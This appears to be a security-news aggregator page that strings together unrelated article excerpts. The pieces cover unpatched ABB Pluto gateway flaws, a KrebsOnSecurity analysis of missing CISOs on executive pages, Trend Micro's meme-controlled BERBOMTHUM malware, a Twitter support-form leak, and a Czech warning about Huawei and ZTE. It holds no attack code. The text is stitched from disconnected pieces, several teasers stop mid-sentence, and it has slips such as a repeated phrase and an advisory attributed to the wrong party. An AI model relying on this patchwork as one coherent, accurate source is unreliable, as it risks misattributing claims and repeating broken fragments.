“Do what we say, or we shall replace you with a very small shell script.” It’s a bit of a dated threat now, but in the age of extreme optimization there are certain functions where it absolutely is a possibility. But who’s going to be the person writing that script? You! Web development is an […]

Security experts at Applied Risk are affected by potentially serious flaws and the bad news is that the vendor will not release firmware updates because the impacted products have reached the end of life.

The security firm published a security advisory that provides technical details for two vulnerabilities in ABB Pluto Gateway products. GATE-E1 and GATE-E2 from ABB.

The ABB gateway solutions allow ABB PLCs to communicate with other control systems.

“Two vulnerabilities were found in the ABB GATE E1/E2 devices. These findings include a total lackofauthentication for the administrative interfaces on the device, as well as an unauthenticated persistentCross-Site Scripting vulnerability.” reads the security advisory published by ABB.

“As a result of these findings, ABB has put the GATE-E2 in End-of-Life.The E1 device was already in EoL. “

The devices do not implement authentication on its administrative telnet/web interface, the flaws could be exploited to change device settings and cause a DoS condition by condition by continuously resetting the product.

Applied Risk assigned to the flaws a CVSS v3 base score of 9.8.

Experts also discovered a persistent cross-site scripting (XSS) flaw that could be exploited by an attacker to inject malicious code via the administrative HTTP and telnet interfaces. The malicious is executed when a legitimate admin will access the device’s web portal. The flaw has been rated as a severity rating of “high.”

ABB also published separate advisories for the missing authentication and XSS vulnerabilities. ABB will send customers instructions on how to secure their installs.

The good news is that the experts are not aware of attacks exploiting the flaws in the wild.

Virtually all companies like to say they take their customers’ privacy and security seriously, make it a top priority, blah blah. But you’d be forgiven if you couldn’t tell this by studying the executive leadership page of each company’s Web site. That’s because very few of the world’s biggest companies list any security executives in their highest ranks. Even among top tech firms, less than half list a chief technology officer (CTO). This post explores some reasons why this is the case, and why it can’t change fast enough.

KrebsOnSecurity reviewed the Web sites for the global top 100 companies by market value, and found just five percent of top 100 firms listed a chief information security officer (CISO) or chief security officer (CSO). Only a little more than a third even listed a CTO in their executive leadership pages.

The reality among high-tech firms that make up the top 50 companies in the NASDAQ market was even more striking: Fewer than half listed a CTO in their executive ranks, and I could find only three that featured a person with a security title.

Nobody’s saying these companies don’t have CISOs and/or CSOs and CTOs in their employ. A review of these companies via LinkedIn suggests that most of them in fact do have people in those roles (although I suspect the few that aren’t present or easily findable on LinkedIn have made a personal and/or professional decision not to be listed as such).

But it is interesting to note which roles companies consider worthwhile publishing in their executive leadership pages. For example, 73 percent of the top 100 companies listed a chief of human resources (or “chief people officer”), and about one-third included a chief marketing officer.

Not that these roles are somehow more or less important than that of a CISO/CSO within the organization. Nor is the average pay hugely different among all three roles. Yet, considering how much marketing (think consumer/customer data) and human resources (think employee personal/financial data) are impacted by your average data breach, it’s somewhat remarkable that more companies don’t list their chief security personnel among their top ranks.

Julie Conroy, research director at the market analyst firm Aite Group, said she initially hypothesized that companies with a regulatory mandate for strong cybersecurity controls (e.g. banks) would have this role in their executive leadership team.

“But a quick look at Bank of America and Chase’s websites proved me wrong,” Conroy said. “It looks like the CISO in those firms is one layer down, reporting to the executive leadership.”

Conroy says this dynamic reflects the fact that revenue centers like human capital and the ability to drum up new business are still prioritized and valued by businesses more than cost centers — including loss prevention and cybersecurity.

“Marketing and digital strategy roles drive top line revenue for firms—the latter is particularly important in retail and banking businesses as so much commerce moves online,” Conroy said. “While you and I know that cybersecurity and loss prevention are critical functions for all types of businesses, I don’t think that reality is reflected in the organizational structure of many businesses still. A common theme in my discussions with executives in cost center roles is how difficult it is for them to get budget to fund the tech they need for loss prevention initiatives.”

EXHIBIT A: EQUIFAX

Common or not, the dominant reporting structure in corporations runs the risk of having security concerns take a backseat when they get in the way of productivity, and often leaves the security team without someone to advocate for the proper budget.

Take the mega breach at Equifax last year that exposed the personal and financial data on 148 million people. Much blame has been placed on lax software patching practices at Equifax, but the cause of the intrusion was ultimately a people and organizational structure issue, argues Lance Spitzner, director of security awarness at the SANS Institute.

“When you bring up the Equifax breach, most people respond that it was a patching issue, the bad guys exploited a Struts vulnerability that Equifax knew about and should have patched,” Spitzner wrote in a breakdown of a damning report released last week by lawmakers on the House Oversight committee.

But why wasn’t it patched? And why did it take them two months to identify the breach? Spitzner says the House report shows the ultimate reason was because the CSO Susan Mauldin did not report to the CIO, but was buried underneath the Chief Legal Officer. IT was siloed from security; the two rarely communicated or coordinated, leaving gaping holes in the organization.

The reason for this organizational divide? Spitzner notes:

“Ten years prior, the CSO reported to the CIO, however they had strong personality conflicts. Since the two could not work together, the CSO was moved under legal. However, when Equifax’s new CIO David Webb and new CSO Susan Mauldin came on board, this split was never resolved. (Full details of this strategic failure start on page 55 of the report. I feel this is one of the most critical findings.) As a result, the CSO is now the CISO and that individual reports directly to the CEO at Equifax today.”

EXECUTIVE SILOS

Workforce experts say the main reason many firms don’t list their security leaders within their top executives is that these people typically do not report directly to the company’s board of directors or CEO. More commonly, the CSO or CISO reports to the CTO, or to the chief information officer.

“You need to make sure that your heads of security are on equal footing with the heads of tech, otherwise there is an inherent conflict at play,” said Anthony Belfiore, chief security officer for insurance company Aon PLC, in a Wall Street Journal story this month about the rising prominence of security leaders at major companies.

Source: Accenture.

Alissa Valentina Knight, senior analyst and colleague of Conroy’s at the Aite Group, said we’re in the middle of a changing of tides — where the CISO function once seen as a technology problem is now moving to a boardroom problem and bringing about a gradual shift in reporting structure.

“Historically, you’d see the CISO reporting to the CTO and despite the company having a CISO, that individual wasn’t listed on the company’s web site, [and] while they had an officer title, they weren’t given that privilege,” Knight said.

But she added that many companies — despite having a CISO — will not list them on their web site’s leadership team page, even when that reporting structure changes from the CTO to the CEO or Board of Directors.

“Some companies are even moving the cybersecurity function to report up through the CFO,” Knight said.

According to a survey released this summer by Accenture, two-thirds of companies said their chief executive and board of directors now have direct oversight of cybersecurity. The survey also found CIOs also had less control over cybersecurity budgets in 2018, 35 percent in 2017 to 29 percent this year, the survey found.

Companies can minimize conflict between the CSO/CISO and other top executives by having their security leader(s) report to the head of operations, or to the company’s general counsel, Belfiore told The Journal. For example, those that have CISOs reporting to CIOs can mix in reporting lines to legal, risk or the CEO office to offset potential conflicts.

*Calculated based on number of top 100 companies with available leadership data (see these Top 100 and Top 50 spreadsheets).

It seems as though not a day goes by without news spreading over another major cyber attack.
Hackers are becoming increasingly efficient at targeting everything from small startups to Fortune 500 companies and even entire government agencies, and as the world moves further away from traditional types of warfare and more toward engaging in all-out cyber warfare, these attacks are only going to

Security researchers at Trend Micro have spotted a new strain of malware that retrieved commands from memes posted on a Twitter account controlled by the attackers. In this way, attackers make it hard to detect traffic associated with the malware that is this case appears as legitimate Twitter traffic.

The use of legitimate web services to control malware is not a novelty, it the past crooks used legitimate services like Gmail, DropBox, PasteBin, and also Twitter to control malicious codes.

The malware discovered by Trend Micro leverages on the steganography to hide the commands embedded in a meme posted on Twitter.

“This new threat (detected as TROJAN.MSIL.BERBOMTHUM.AA) is notable because the malware’s commands are received via a legitimate service (which is also a popular social networking platform), employs the use of benign-looking yet malicious memes, and it cannot be taken down unless the malicious Twitter account is disabled.” reads the post published by Trend Micro.

“Twitter has already taken the account offline as of December 13, 2018.”

Attackers hid the “/print” command in the memes, it allows them to take screenshots of the infected machine and send them back to a C&C server whose address is obtained through a hard-coded URL on pastebin.com.

The BERBOMTHUM malware checks the Twitter account used by the attackers, downloads and scans meme files, and extracts the command they include.

The Twitter account used by miscreants was created in 2017 and contained only two memes posted on October 25 and 26. The images were used to deliver the “/print” commands to the malware.

Below the list of commands supported by the malware:

Commands

Description

/print

Screen capture

/processos

Retrieve list of running processes

/clip

Capture clipboard content

/username

Retrieve username from infected machine

/docs

Retrieve filenames from a predefined path such as (desktop, %AppData% etc.)

According to Trend Micro, the malware is in the early stages of its development, experts noticed that the Pastebin link points to a local,

Reporting is the final and potentially most important phase of a red team assessment. The goal of a red team assessment is to provide the client with a comprehensive view of their security and the ability to act to correct any identified issues. Any part of the assessment that the client can’t understand and act […]

Twitter has been hit with a minor data breach incident that the social networking site believes linked to a suspected state-sponsored attack.
In a blog post published on Monday, Twitter revealed that while investigating a vulnerability affecting one of its support forms, the company discovered evidence of the bug being misused to access and steal users’ exposed information.
The impacted

Twitter discovered a possible nation-state attack while it was investigating an information disclosure flaw affecting its platform.

Experts at Twitter discovered a possible state-sponsored attack while they were investigating an information disclosure vulnerability affecting its support forms. The experts discovered that the attack was launched from IP addresses that may be linked to nation-state actors.

The flaw affected a support form that could be used to contact Twitter in case of problems with an account. The flaw could have been exploited to obtain the country code of a user’s phone number and determine whether or not the account had been locked by Twitter.

An account could be locked if it violates rules or terms of service, or if the account was compromised. The social media platform fixed the flaw on November 15, in just 24 hours.

The experts noticed a suspicious activity related to the API associated with the flawed customer support form.

“During our investigation, we noticed some unusual activity involving the affected customer support form API.” reads a blog post published by Twitter.

“Specifically, we observed a large number of inquiries coming from individual IP addresses located in China and Saudi Arabia. While we cannot confirm intent or attribution for certain, it is possible that some of these IP addresses may have ties to state-sponsored actors. We continue to err on the side of full transparency in this area and have updated law enforcement on our findings.”

Twitter, like many other social media platforms, are a privileged target for state-sponsored hackers that could use them for online propaganda and spread fake news.

In November, the researcher Terence Eden discovered that the permissions dialog when authorizing certain apps to Twitter could expose direct messages to the third-party. The expert was awarded $2,940 for reporting the bug to the company under the bug bounty program operated through the HackerOne platform.

Security researchers have discovered yet another example of how cybercriminals disguise their malware activities as regular traffic by using legitimate cloud-based services.
Trend Micro researchers have uncovered a new piece of malware that retrieves commands from memes posted on a Twitter account controlled by the attackers.
Most malware relies on communication with their

A Czech cyber-security agency is warning against using Huawei and ZTE technologies because they pose a threat to state security.

The Chinese nightmare is rapidly spreading among European countries, now a Czech cyber-security agency is warning against using the equipment manufactured by Chinese firms Huawei and ZTE because they pose a threat to state security.

“The main issue is a legal and political environment of the People’s Republic of China, where (the) aforementioned companies primarily operate,” reads a statement issued by the Czech National Cyber and Information Security Agency.

“China’s laws, among other things, require private companies residing in China to cooperate with intelligence services, therefore introducing them into the key state systems might present a threat,”

According to the Czech News Agency (CTK), the Czech branch of the Chinese Telco giant Huawei refused any accusation and asked the agency to offer proof of the alleged espionage activities for the Chinese intelligence.

“The warning comes on the heels of a Czech intelligence report which warned about increased spying activities of Chinese diplomats in the EU and NATO member state of 10.6 million people.” reported the AFP press.

The US first, and many other countries after, have decided to ban network equipment manufactured by the Chinese telecom giant Huawei.

In November 2018, the Wall Street Journal reported that the US Government was urging its allies, including Germany, to exclude Huawei from critical infrastructure and 5G architectures.

The Chinese firm was already excluded by several countries from building their 5G internet networks. The United States, Australia, New Zealand, and Japan announced the exclusion of Huawei technology for their 5G internet networks.

The United States is highlighting the risks for national security in case of adoption of Huawei equipment and is inviting internet providers and telco operators in allied countries to ban the company.

Now Germany’s IT watchdog has expressed its opinion about the ban of the Huawei technology, it has highlighted that there is no evidence that the equipment could be used by Chinese intelligence in cyber espionage activity.